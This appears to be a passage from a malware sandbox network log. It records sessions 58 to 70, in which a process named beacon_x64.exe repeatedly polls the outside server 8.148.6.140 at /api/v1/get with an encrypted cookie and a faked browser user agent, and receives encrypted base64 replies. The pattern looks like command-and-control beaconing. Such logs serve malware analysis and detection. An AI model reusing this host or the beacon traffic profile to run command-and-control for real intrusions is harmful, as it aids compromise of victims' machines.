jmVqW80/b6rYCq40bNrX383wrHVCASnWZ79K7xR8CDuH69f0dvAz+d3kYBctQTBrf8GAbnSBGERtTIZJZi2bWcnncQbOMfNg9zeHA1Mxurt5REmblaIeFNoVtGtltJX8mDHaLYHbnN/StSUGp4z/89hlOnlc20BO4oNidcOSSI225hmdgbqs4il4xvwAiXVr5nK2PD+47PE8yaDlHNuxZSWrPX6b6D7hhb9DZkDOnynZoAyUYUn/MjWJPBOFh+lv/8XJRVL04KAL6tGwum1hdg5H5+MGqpUQXOPZLZRjSNij9qrgaL6totnlzA4gzd5txfg681SX+0g0dizWMgkLiVd9kN5+sCu+4Fy+SKafUNEJRFQjPuGvXWbzOXH2IDqp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	50045	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:46.318027020 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:47.297995090 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:47 GMT Server: nginx Content-Length: 236 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:26:47.298146009 CET	236	IN	Data Raw: 71 48 4d 4f 57 38 6d 42 38 4c 36 6a 78 31 49 6e 35 33 45 67 63 57 32 52 66 62 43 4e 68 49 72 38 66 63 44 34 72 56 46 4c 7a 78 62 2b 32 68 62 77 65 56 31 73 59 72 42 68 55 33 72 65 69 61 39 6a 61 38 76 73 50 30 32 30 46 4f 51 76 4b 35 70 48 42 38 Data Ascii: qHMOW8mB8L6jx1In53EgcW2RfbCNhIr8fcD4rVFLzxb+2hbweV1sYrBhU3reia9ja8vsP020FOQvK5pHB86YM1ZMWxPlfRA104qHZwQ1/Ys55/CslWRnXFTObxDYZFderCjSNGaf3FdrvXkR1/UnZ/ROZuocjp38TiA+9R3hyJqmQ/MP6zeQeHoIi1dNl28aUyGlohP+t7XOziju3chfvyDEkxKVY8XT5bqdidO+wdE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	50046	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:47.421591043 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:48.383600950 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:48 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:26:48.383712053 CET	364	IN	Data Raw: 37 4b 62 4a 63 50 77 5a 7a 73 2f 76 30 44 30 45 47 56 2f 4f 66 33 6a 63 39 47 65 77 47 36 5a 42 63 42 43 41 6c 54 34 51 50 34 45 6d 6d 49 31 59 54 45 6f 42 63 52 42 65 4d 57 37 49 43 70 73 79 36 49 62 72 48 45 4d 44 4a 4d 39 4e 56 35 31 54 65 75 Data Ascii: 7KbJcPwZzs/v0D0EGV/Of3jc9GewG6ZBcBCAlT4QP4EmmI1YTEoBcRBeMW7ICpsy6IbrHEMDJM9NV51TeuHD0B4X8xW6O6UL4i5VQXjcX8g5ahoOrE6tuEK+UVp3T46zC2JnhdhzEFQus65sfzKmQch6kqGMd6g59q3ImYYtZLRTDz3BZtM8ji4s3F0tNxCH7Hmr6fY8324YWYa/3vrW8CPojLV5ACQwDf/vokZWkJUkpBa8uTs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	50047	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:48.507354021 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:50.069509029 CET	293	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:49 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 62 4d 64 71 45 2b 76 77 65 45 52 42 43 56 35 66 43 55 74 39 57 64 6f 64 48 6d 58 46 37 59 4d 4f 4a 4a 4f 34 34 78 55 6a 77 4d 4f 35 67 4f 34 4c 36 53 4a 68 55 54 4a 6c 67 4a 6a 6d 4f 66 64 37 42 57 33 75 35 4e 55 31 77 78 45 76 35 30 4e 39 48 67 4d 55 53 6c 5a 2f 78 71 44 35 50 6f 4f 44 76 39 43 30 76 76 6a 72 37 30 73 3d Data Ascii: bMdqE+vweERBCV5fCUt9WdodHmXF7YMOJJO44xUjwMO5gO4L6SJhUTJlgJjmOfd7BW3u5NU1wxEv50N9HgMUSlZ/xqD5PoODv9C0vvjr70s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	50048	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:50.188379049 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	50049	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:54.318365097 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:55.285631895 CET	293	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:55 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 73 77 6b 2f 37 47 5a 53 41 77 6d 58 6a 6b 45 36 71 38 74 74 7a 56 65 57 49 4b 56 35 78 51 65 4e 69 34 31 41 34 49 39 49 6b 4e 43 6b 41 51 4e 67 65 68 55 70 6e 7a 68 64 39 4c 63 51 74 54 47 46 70 34 4b 49 59 39 4d 58 4c 44 6f 46 53 6d 2f 54 4d 7a 43 71 4d 39 6a 50 63 4f 43 30 5a 5a 50 43 36 6b 71 74 48 67 6a 2f 6b 30 67 3d Data Ascii: swk/7GZSAwmXjkE6q8ttzVeWIKV5xQeNi41A4I9IkNCkAQNgehUpnzhd9LcQtTGFp4KIY9MXLDoFSm/TMzCqM9jPcOC0ZZPC6kqtHgj/k0g=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	50050	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:55.405477047 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:56.980648994 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:56 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 78 52 33 30 46 70 41 66 2f 2b 58 76 64 72 7a 62 55 46 73 55 2b 53 36 50 71 67 77 38 59 72 65 31 70 6d 69 47 41 47 44 54 33 58 34 4e 6c 4b 6e 63 6f 58 6a 53 39 46 77 43 49 32 44 4f 33 4c 57 65 5a 48 30 56 37 2f 50 6d 68 4d 46 69 6d 5a 51 55 53 66 78 65 46 77 33 67 46 45 57 6d 51 47 6b 57 49 34 76 4c 64 30 79 58 6d 75 4a 6c 38 51 72 4e 38 71 47 78 61 62 46 7a 56 76 6e 4c 59 41 55 4f 39 77 6a 33 4b 62 78 44 69 44 55 57 4c 37 54 30 4c 69 4d 41 56 62 77 6f 30 53 76 72 75 56 6c 36 56 53 34 30 41 44 2f 69 78 71 79 6a 6e 59 50 32 5a 5a 4e 72 56 7a 6e 6a 32 67 6e 6d 62 61 32 4e 42 53 46 6b 41 4e 72 37 7a 78 36 47 53 49 32 38 67 31 42 79 78 79 41 45 43 4a 76 32 73 38 6a 2b 37 41 30 51 79 75 46 42 50 38 39 4e 34 64 39 49 59 76 2b 38 6d 62 35 63 58 6d 38 54 41 4e 50 67 6a 71 6e 41 32 34 4d 48 71 63 36 51 43 53 64 4b 66 78 4d 73 65 64 6e 6b 75 4c 74 50 69 48 72 38 62 4e 78 35 72 75 39 6d 70 31 6d 4f 67 78 77 39 56 41 2f 70 4d 30 56 58 56 2f 4f 7a 46 41 6c 6e Data Ascii: xR30FpAf/+XvdrzbUFsU+S6Pqgw8Yre1pmiGAGDT3X4NlKncoXjS9FwCI2DO3LWeZH0V7/PmhMFimZQUSfxeFw3gFEWmQGkWI4vLd0yXmuJl8QrN8qGxabFzVvnLYAUO9wj3KbxDiDUWL7T0LiMAVbwo0SvruVl6VS40AD/ixqyjnYP2ZZNrVznj2gnmba2NBSFkANr7zx6GSI28g1ByxyAECJv2s8j+7A0QyuFBP89N4d9IYv+8mb5cXm8TANPgjqnA24MHqc6QCSdKfxMsednkuLtPiHr8bNx5ru9mp1mOgxw9VA/pM0VXV/OzFAln

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	50051	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:57.099344015 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:58.651422024 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:58 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 78 36 42 61 2b 79 4f 63 70 65 73 73 33 2f 34 66 65 30 6a 73 71 7a 67 6e 74 38 63 73 34 76 6c 6e 4b 30 77 59 4f 43 6d 36 45 6e 65 62 66 67 31 6d 72 38 49 50 65 74 53 4f 2b 2f 73 32 31 4a 65 58 31 4e 44 4e 76 64 41 70 52 5a 62 79 2f 4c 4d 64 4e 71 45 69 44 35 78 73 50 5a 6a 71 2f 56 49 62 4c 51 66 77 39 79 36 6a 76 36 66 35 4f 70 71 79 79 36 48 47 62 72 51 41 50 43 79 79 39 4b 70 6d 4e 4d 35 52 6a 51 73 46 51 42 45 67 30 6e 6b 6f 42 58 4f 62 4a 53 56 4a 58 64 54 7a 77 64 6d 43 64 32 4b 6d 2f 46 33 4c 75 51 61 64 70 45 58 67 79 6a 61 4b 77 41 4c 31 2b 76 61 4c 6a 41 77 53 66 58 69 51 67 41 73 76 42 7a 56 4f 72 51 71 61 55 69 69 4d 31 42 57 73 49 70 33 4e 4b 66 38 74 2b 58 46 67 38 53 69 71 5a 51 2f 33 38 4e 4e 54 66 45 4b 4d 53 49 44 67 61 49 2b 6c 6c 61 6d 69 2b 43 47 55 57 2b 49 34 68 72 76 57 79 51 50 46 55 6d 62 75 75 6b 52 37 62 34 64 5a 6c 4d 6b 43 4b 66 58 4b 73 54 66 65 6f 59 5a 65 50 41 2f 6b 55 34 48 2f 58 49 69 72 62 61 63 6d 30 4a 44 76 Data Ascii: x6Ba+yOcpess3/4fe0jsqzgnt8cs4vlnK0wYOCm6Enebfg1mr8IPetSO+/s21JeX1NDNvdApRZby/LMdNqEiD5xsPZjq/VIbLQfw9y6jv6f5Opqyy6HGbrQAPCyy9KpmNM5RjQsFQBEg0nkoBXObJSVJXdTzwdmCd2Km/F3LuQadpEXgyjaKwAL1+vaLjAwSfXiQgAsvBzVOrQqaUiiM1BWsIp3NKf8t+XFg8SiqZQ/38NNTfEKMSIDgaI+llami+CGUW+I4hrvWyQPFUmbuukR7b4dZlMkCKfXKsTfeoYZePA/kU4H/XIirbacm0JDv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	50052	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:58.768821955 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:59.749748945 CET	293	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:59 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 31 34 2b 79 57 68 54 34 2b 38 47 4d 53 53 6e 38 6b 31 61 45 57 49 72 2f 38 2b 37 70 30 70 6b 59 57 45 6a 6f 35 30 61 4d 64 6b 2b 4e 52 4e 4d 32 63 34 4f 48 52 63 37 35 33 4b 56 38 74 38 53 71 63 5a 31 51 44 36 54 56 4e 35 37 6d 77 7a 6d 50 43 74 54 37 68 56 38 74 77 6e 73 75 31 67 43 35 42 43 63 71 59 57 4c 43 78 79 77 3d Data Ascii: 14+yWhT4+8GMSSn8k1aEWIr/8+7p0pkYWEjo50aMdk+NRNM2c4OHRc753KV8t8SqcZ1QD6TVN57mwzmPCtT7hV8twnsu1gC5BCcqYWLCxyw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	50053	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:59.863451004 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:00.837529898 CET	529	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:00 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 4c 68 65 70 5a 31 6d 44 43 45 61 37 2b 37 56 51 56 7a 73 32 61 2f 74 41 65 33 57 67 73 56 6f 43 45 6f 64 65 41 44 79 52 37 77 55 78 34 32 4e 39 78 66 71 6e 6f 69 68 61 6d 6b 36 53 5a 47 5a 65 33 61 4b 69 7a 52 49 4b 65 5a 74 72 6c 72 31 6c 5a 65 4e 77 43 75 42 53 74 78 50 57 6c 73 63 4b 72 39 5a 6f 56 52 42 6f 43 6a 62 43 76 6f 4c 6d 72 50 36 59 6f 4f 52 6b 53 34 33 58 39 57 71 43 45 6e 7a 55 4f 74 4e 53 30 61 77 42 6b 37 74 33 51 53 69 73 5a 78 51 45 36 43 47 38 66 78 34 6c 49 72 56 52 48 30 52 4e 4e 73 47 46 6c 6d 42 75 42 43 43 59 65 41 37 37 61 76 69 6f 58 70 4b 32 64 6c 4a 36 6b 67 48 76 7a 51 57 68 70 6f 4d 66 45 50 49 48 4f 39 42 46 64 56 5a 32 50 42 54 48 50 52 59 6e 30 69 72 65 37 42 7a 6c 47 63 4d 71 6f 38 65 4a 38 59 73 50 73 4f 6d 4e 32 44 6e 51 35 75 58 63 39 79 5a 41 79 72 71 37 77 49 75 6b 72 30 65 39 57 43 55 4d 49 43 76 2f 76 34 6c 57 79 4b 55 66 6a 61 6f 6d 62 2b 48 59 66 44 45 68 76 4e 61 72 70 45 65 4a 47 70 69 70 57 53 5a 36 74 6c 44 70 71 48 2f 45 65 63 6e 41 6a 49 6b 5a 71 6b [TRUNCATED] Data Ascii: LhepZ1mDCEa7+7VQVzs2a/tAe3WgsVoCEodeADyR7wUx42N9xfqnoihamk6SZGZe3aKizRIKeZtrlr1lZeNwCuBStxPWlscKr9ZoVRBoCjbCvoLmrP6YoORkS43X9WqCEnzUOtNS0awBk7t3QSisZxQE6CG8fx4lIrVRH0RNNsGFlmBuBCCYeA77avioXpK2dlJ6kgHvzQWhpoMfEPIHO9BFdVZ2PBTHPRYn0ire7BzlGcMqo8eJ8YsPsOmN2DnQ5uXc9yZAyrq7wIukr0e9WCUMICv/v4lWyKUfjaomb+HYfDEhvNarpEeJGpipWSZ6tlDpqH/EecnAjIkZqkf+ew==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	50054	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:00.959326982 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:01.918735027 CET	357	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:01 GMT Server: nginx Content-Length: 172 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 65 69 4f 50 6d 75 37 34 55 53 4f 63 54 42 41 4e 44 57 67 75 38 6b 73 68 4a 58 59 66 6f 43 46 43 2f 57 35 34 67 36 54 46 78 61 54 56 65 33 45 67 72 36 58 43 59 4f 6d 30 44 2b 34 58 65 52 63 49 66 52 56 7a 57 56 54 68 34 54 33 30 42 48 61 47 76 42 65 76 2b 52 43 38 43 53 32 46 48 74 79 31 33 32 71 49 71 77 37 75 59 61 52 69 4e 4f 7a 6d 50 7a 62 54 43 72 52 58 44 4b 50 6b 41 34 70 70 53 30 4e 58 57 39 38 53 54 64 57 6a 58 78 4b 49 53 66 4f 68 59 6b 43 61 34 69 63 4f 56 57 69 44 74 70 58 39 62 43 41 75 36 5a 4d 3d Data Ascii: eiOPmu74USOcTBANDWgu8kshJXYfoCFC/W54g6TFxaTVe3Egr6XCYOm0D+4XeRcIfRVzWVTh4T30BHaGvBev+RC8CS2FHty132qIqw7uYaRiNOzmPzbTCrRXDKPkA4ppS0NXW98STdWjXxKISfOhYkCa4icOVWiDtpX9bCAu6ZM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	50055	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:02.047360897 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:04.460125923 CET	421	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:04 GMT Server: nginx Content-Length: 236 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 46 77 73 75 68 71 6b 4f 71 32 31 52 30 70 4e 63 4f 71 38 4d 50 6e 57 6d 70 48 57 39 53 33 78 71 52 5a 63 63 30 68 69 77 4c 4c 45 33 75 78 76 42 76 39 70 66 4c 42 5a 69 36 6c 6b 6a 63 49 45 62 72 69 4a 77 32 54 63 71 42 2f 4a 66 59 32 76 57 59 56 61 51 72 76 6f 49 49 44 30 67 79 6b 64 68 6c 43 53 6e 57 64 38 45 78 68 4a 44 4b 41 5a 57 66 37 71 4c 31 46 57 78 77 54 37 57 5a 6f 53 76 4e 57 69 45 55 38 36 74 54 74 37 49 64 79 34 79 6b 7a 43 61 55 37 44 5a 4f 39 4e 6e 43 32 77 35 6e 55 72 72 72 41 5a 77 32 64 32 4e 57 65 52 6e 70 36 4e 66 46 72 56 4a 41 5a 6a 6e 33 65 65 4a 74 75 6e 66 6c 51 70 64 6d 2f 36 62 65 6b 4a 54 35 66 4a 73 31 31 32 6e 69 6f 2b 52 6a 45 41 32 37 70 79 50 69 59 35 52 76 78 38 3d Data Ascii: FwsuhqkOq21R0pNcOq8MPnWmpHW9S3xqRZcc0hiwLLE3uxvBv9pfLBZi6lkjcIEbriJw2TcqB/JfY2vWYVaQrvoIID0gykdhlCSnWd8ExhJDKAZWf7qL1FWxwT7WZoSvNWiEU86tTt7Idy4ykzCaU7DZO9NnC2w5nUrrrAZw2d2NWeRnp6NfFrVJAZjn3eeJtunflQpdm/6bekJT5fJs112nio+RjEA27pyPiY5Rvx8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	50056	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:04.622684956 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:05.605257034 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:05 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:27:05.605334044 CET	108	IN	Data Raw: 66 52 54 34 6e 65 6c 5a 38 47 53 48 69 36 38 4d 53 34 45 54 73 77 4c 61 55 52 43 78 35 4e 46 56 51 74 6d 7a 72 75 4d 4b 62 44 5a 6c 78 63 4b 56 6e 37 6c 39 34 49 6d 56 52 65 64 4d 44 5a 34 6d 69 70 47 54 79 63 70 75 70 50 4c 76 45 69 44 71 49 4d Data Ascii: fRT4nelZ8GSHi68MS4ETswLaURCx5NFVQtmzruMKbDZlxcKVn7l94ImVRedMDZ4mipGTycpupPLvEiDqIMpxwwWzZK7gW6i1ve/y9Xhzi5s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	50057	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
